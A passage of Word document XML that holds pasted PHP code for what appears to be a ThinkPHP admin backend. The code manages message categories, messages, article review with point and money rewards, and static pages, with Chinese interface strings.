    </w:p>
    <w:p w14:paraId="52257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_name" =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A9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6D8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282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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C572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json) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259526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json_decode($html, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6E0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2FDE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787F3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147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 $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3D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1E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rl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471A8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274BC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555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611E82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jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A925F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76A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3F7F0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0728E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46384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79016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46853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00329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2ECB64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url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBA9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45031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219B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B291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3505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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D750E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A80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8F75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html_content($article)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE8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01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src=\"(.*?)\"/", $article, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB9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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB69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 =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FB5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1 = $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009A1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2 = _imgUrl() . $this-&gt;qiniu($img_1, 'circle');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C86EF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_1 &amp;&amp; $img_2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1BA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str_replace($img_1, $img_2, $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40467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7BE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D0D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FFD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mg_width.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F958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mg_height.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3D0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onerror.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D462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nline.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67300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p.*?)&gt;/si", "&lt;p&gt;", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B1F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figure.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28B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a.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652ED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data.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524318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width.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301D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alt.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7C9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style.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5B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ticle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5C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1E47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49C5D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DC5DD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5AC8B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603C9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0FA35A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08D22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01E9DD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03D15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124EC0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ssage extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E9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B799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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B2C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91F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message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71789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3A3707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types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3842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55276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A0A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B7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29A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ype_id = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F04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Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C2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ype_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75320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BE65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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B7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66EDC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12B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_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17194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C14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75B5D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5CE12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45D5C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E245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44A1E8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1254A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type = Db::name('message_type')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55951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_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422CE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同标题分类已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653A3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BAC7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55905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_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D44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69C06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16525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302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025D1F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89A1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3FFD2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_type')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD654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2778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4E421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84FB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059126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7E4A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FAE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C0BD0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post</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4378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7B9E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8885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213A4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Db::name('message_type')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA7C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4E6DD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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE3D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9E44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662FB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25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40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4227D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0CF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39A2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FB7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ete_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7B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754D4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1C5C01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10BC5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24C81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2C301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count = Db::name('message')-&gt;where('type_id', $id)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE13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_count &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B232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_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA64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C88A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60DB71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95E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5AFD58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470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48D1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属性下有文章，请先删除文章对应属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD46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0AF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99053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60CD4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4803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8C67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00DFC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5011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EBC6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378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2DACA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972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message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5F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66A0D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type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943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 = input('search_name', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E2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message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A416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desc');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFD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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1079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type_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FEB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F94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earch_name != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B6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content', 'like', '%' . $search_name . '%');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EE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B8F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query-&gt;paginate('', false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F73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 = $data-&gt;toArray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F3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messages as $key =&gt; $message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEC3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key]['type'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BC1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essage['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9F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46617A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key]['sender_info'] = $message['sender_id'] ? '(' . $message['sender_id'] . ') ' . _user($message['sender_id'])['username'] : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来自平台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24947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D02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1F4BF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_id', $type_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40649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s', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E484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messages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBF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page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F1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68C827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8BE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219563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217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s = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6EF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asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FF9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B1EFB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s', $types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9A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aram.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E257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7DAEC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34ABA9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ype_id'] &lt;= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38846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请选择消息分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B815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D5C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create_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C1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strtotime($post['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655A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E72A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2EDCE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368F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 = $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436F0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ost['content'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB840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ontent'] = trim($post['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1992F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2C47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5BBE01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recipient_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906A0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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F78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40EA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603F3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5065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1013F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63C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7922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s = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C128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asc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC0E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4E27F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members as $member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA99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recipient_id'] = $member['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F261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ssage')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E9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448C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04C5A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BE55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6D8D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576BC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5C9CCC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post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06634B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A49C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6BF91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3F7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514747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69F94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0F37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9C87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39DA1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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F548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691E2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4A225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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81C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_id', $message['type_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D208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ssage', $message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D350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9BBA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2F3A6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FD6F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BBB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729C4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245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AF30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91F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ete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C4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4C2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10BCD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38D5F4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03047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5E1B7A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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A1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2D607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77F80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0A910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70F14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8B1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EC8E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4E1EC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C31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6DF8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参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F603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ECC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6DBA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A41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sAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD400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9A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70028F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2D52A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ost['des'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571154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tval($k);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7D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ntval($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884D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ssage')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26E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0D7782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Field('des', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB0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51F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更新排序成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995F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A47F0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24E19B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292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AEAC2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2F7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All()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D94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2D6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4D581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47656D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post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19285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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FBA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gt;delete($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E03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65EB9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1AC0A5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8A9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3F6C3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EC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C6CE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未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993ED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51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436F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1C494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C4F1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B7962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CC6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ll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E455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318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0BBF5F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47ADF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79312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post.delAll')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C9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post['delAll'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0EB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA69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ost as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B387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del') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C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delete($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30984B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A108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gt;where('id', $v)-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB7C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7AF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E21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1EA0B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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EE9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9BC2A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA8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51A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6C1A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删除失败，未选中数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34A0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F13C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89BB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提交类型错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF7F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FDC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8E88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C731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75D11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AF83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525E06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 ? input('id') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C316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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE0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0' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '1' =&gt; '&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;', '2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', '3' =&gt; '&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D2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7ECD4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 = Db::name('message')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3C9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uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF28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0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C4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管理员设置隐藏状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD9F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ype == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B992A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拒绝通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE7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ype == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17229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管理员设置审核状态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25464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A8E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E41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uid'] &amp;&amp; $type == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF58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where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F3C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dd = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2E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Hide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C4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core = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E577F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Num = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA7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Code = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B26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Jingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B769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Money = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FC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702682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Money) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058D0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money',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3A3AB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79AE65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Money, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3277A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aritlce['uid'])-&gt;setInc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337AA7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870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71F8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Score) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02669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score',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359161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254A21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Score, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA17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aritlce['id'])-&gt;setInc('score', $articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1A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7BEDF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9BC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Jingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B1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jingyan',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data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117F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Jingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED18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articleJingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3729D3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Inc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF37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F466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151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aritlce['u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itlce['id'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A5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FDE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ssage')-&gt;where('id', $aritlce['id'])-&gt;setField('hide', $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAC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D335D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ext[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169707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B10A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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09657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CBBD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A31F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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB64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B01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7DD9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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B388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6115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17B2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933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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56958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BB6F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page')-&gt;order('id asc,des desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF6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 $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7F7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3F0775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3C4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geAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B1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9EC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3D5A0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Ajax()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42536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14A4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F7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ost['title']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5E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 = Db::name('page')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA6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db) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F9AD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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49792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DF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12D7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age')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8A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8E738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添加成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19817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5D58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添加失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C99FF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AFB7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1C391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age')-&gt;where('id', $id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECC3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1A073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成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D70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DF5E5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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B9C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6D7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DA9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74A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764C2C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b::name('page')-&gt;where('id', $id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63617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name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC90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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC4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84FE4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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
